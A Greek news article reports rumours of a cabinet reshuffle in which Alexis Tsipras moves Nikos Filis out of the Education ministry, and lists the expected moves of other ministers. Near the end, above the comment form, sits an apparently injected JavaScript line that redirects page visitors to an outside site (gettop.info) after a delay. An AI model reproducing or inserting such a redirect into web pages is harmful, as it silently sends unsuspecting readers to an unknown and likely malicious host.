Εκρηκτικό κλίμα στην κυβέρνηση -Ο Τσίπρας βγάζει τον Φίλη από το Παιδείας

0
26

Εκρηκτική είναι η ατμόσφαιρα στο εσωτερικό της κυβέρνησης, τις τελευταίες ώρες, καθώς ο πρωθυπουργός έχει αποφασίσει να μετακινήσει από το υπουργείο Παιδείας τον Νίκο Φίλη, ώστε να εκτονώσει την ένταση με την Εκκλησία, αλλά εκείνος αντιδρά προβάλλοντας το επιχείρημα ότι οι αντιπρόσωποι της κοινωνικής βάσης του Σύριζα τον εξέλεξαν στη δεύτερη θέση της κεντρικής επιτροπής -πράγμα που σημαίνει ότι στηρίζουν την πολιτική του.

Στο πλευρό του βρίσκεται και ο πρόεδρος της Βουλής Νίκος Βούτσης (προσωπικός του φίλος εδώ και 35 χρόνια). ωστόσο ο Αλέξης Τσίπρας εμφανίζεται αμετακίνητος και του προτείνει να πάει στο υπουργείο Εσωτερικών. Πληροφορίες τον φέρουν δε να έχει επιλέξει ως αντικαταστάτη του, τον καθηγητή Κώστας Γιαβρόγλου.

Το κλίμα είναι τόσο φορτισμένο, ώστε δεν αποκλείεται να βρεθεί ακόμη και εκτός κυβερνήσεως ο Νίκος Φίλης.

Αντ’ιθετα, για τον Πάνο Σκουρλέτη τα πράγματα φαίνεται να είναι καλύτερα, παρότι χθες μπλόκαρε την επένδυση στις Σκουριές και εμφανίστηκε ξανά αντίθετος με την ιδιωτικοποίηση του 17% της ΔΕΗ.  Ο μεν πρωθυπουργός δείχνει να μη θέλει να ανοίξει εσωκομματικό μέτωπο, ενώ και ο υπουργός μάλλον βάζει νερό στο κρασί του  και δέχεται να πάει σε άλλο υπουργείο.

Το Τομέα των ιδιωτικοποιήσεων (της Ενέργειας, δηλαδή) πιθανότατα αναλαμβάνει ο Γιώργος Σταθάκης, ενώ ο Παναγιώτης Κουρουμπλής κατευθύνεται προς το υπουργείο Ναυτιλίας.

Ο Νίκος Παππάς μάλλον αναλαμβάνει το νέο υπουργείο Ψηφιακής πολιτικής, με αρμοδιότητα τα ΜΜΕ, και στη θέση του στο υπουργείο Επικρατείας μάλλον πηγαίνει ο έως σήμερα αναπληρωτής υπουργός Εσωτερικών Χριστόφορος Βερναρδάκης . Τον τελευταίο, ίσως, διαδεχθεί η Όλγα Γεροβασίλη που αφήνει τη θέση του κυβερνητικού εκπροσώπου για τον Δημήτρη Τζανακόπουλο, στενό συνεργάτη του πρωθυπουργού.

Αμετακίνητοι είναι ο αντιπρόεδρος Γιάννης Δραγασάκης, ο υπουργόε Οικονομικών Ευκλείδης Τσακαλώτος, ο αναπληρωτής του Γιώργος Χουλιαράκης, ο υπουργός Άμυνας Πάνος Καμμένος, Ο υπουργός Εξωτερικών και ο υπουργός Υγείας Ανδρέας Ξανθός.

Εκτός κυβερνήσεως ο υπουργός Ναυτιλίας Θόδωρος Δρίτσας, ο υπουργός Πολιτισμού Αριστείδης Μπαλτάς και ο υπουργός αναπληρωτής Αγροτικής Πολιτικής Βαγγέλης Αποστόλου.

 

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here